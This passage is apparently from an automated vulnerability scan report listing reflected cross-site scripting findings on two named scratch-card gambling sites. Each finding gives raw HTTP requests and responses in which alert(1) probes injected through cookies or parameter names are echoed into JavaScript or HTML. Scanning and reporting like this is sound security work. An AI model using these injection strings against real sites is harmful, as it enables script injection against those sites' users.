Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMc84ee"-alert(1)-"d1b4367f894; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc84ee"-alert(1)-"d1b4367f894; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc84ee"-alert(1)-"d1b4367f894";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.90. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f3ae"-alert(1)-"71c4f817bc was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM2f3ae"-alert(1)-"71c4f817bc; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: BO=FM2f3ae"-alert(1)-"71c4f817bc; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2f3ae"-alert(1)-"71c4f817bc";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.91. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7b33"-alert(1)-"217dc5d8aff was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMb7b33"-alert(1)-"217dc5d8aff; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb7b33"-alert(1)-"217dc5d8aff; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb7b33"-alert(1)-"217dc5d8aff";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.92. http://home.okscratchcards.com/Terms.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ebe8"-alert(1)-"bda4796c29a was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM4ebe8"-alert(1)-"bda4796c29a; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: BO=FM4ebe8"-alert(1)-"bda4796c29a; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4ebe8"-alert(1)-"bda4796c29a";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.93. http://home.okscratchcards.com/Terms.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25b68"-alert(1)-"b52c242e1ba was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM25b68"-alert(1)-"b52c242e1ba; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM25b68"-alert(1)-"b52c242e1ba; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM25b68"-alert(1)-"b52c242e1ba";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.94. http://home.okscratchcards.com/help.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f790"-alert(1)-"75a755f3e70 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM7f790"-alert(1)-"75a755f3e70; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: BO=FM7f790"-alert(1)-"75a755f3e70; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7f790"-alert(1)-"75a755f3e70";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.95. http://home.okscratchcards.com/help.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af511"-alert(1)-"3a9f6fdf6e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMaf511"-alert(1)-"3a9f6fdf6e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMaf511"-alert(1)-"3a9f6fdf6e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMaf511"-alert(1)-"3a9f6fdf6e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.96. http://okscratchcards.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://okscratchcards.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70343'-alert(1)-'89d3bb43680 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?70343'-alert(1)-'89d3bb43680=1 HTTP/1.1
Host: okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 16 May 2011 11:40:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.okscratchcards.com/?70343'-alert(1)-'89d3bb43680=1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&70343'-alert(1)-'89d3bb43680=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.97. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e45f0"%3balert(1)//7fd470c036e was submitted in the ARC cookie. This input was echoed as e45f0";alert(1)//7fd470c036e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e45f0"%3balert(1)//7fd470c036e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137e45f0%22%3Balert%281%29%2F%2F7fd470c036e; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137e45f0";alert(1)//7fd470c036e' border='0' width='1' height='1'>
...[SNIP]...

3.98. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload e4f61--><script>alert(1)</script>89a53cc69f9 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e4f61--><script>alert(1)</script>89a53cc69f9; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137e4f61%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E89a53cc69f9; expires=Tue, 15-May-2012 12:38:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137e4f61--><script>alert(1)</script>89a53cc69f9">
...[SNIP]...

3.99. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48d54'%3balert(1)//d85284f838d was submitted in the ARC cookie. This input was echoed as 48d54';alert(1)//d85284f838d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013748d54'%3balert(1)//d85284f838d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013748d54%27%3Balert%281%29%2F%2Fd85284f838d; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
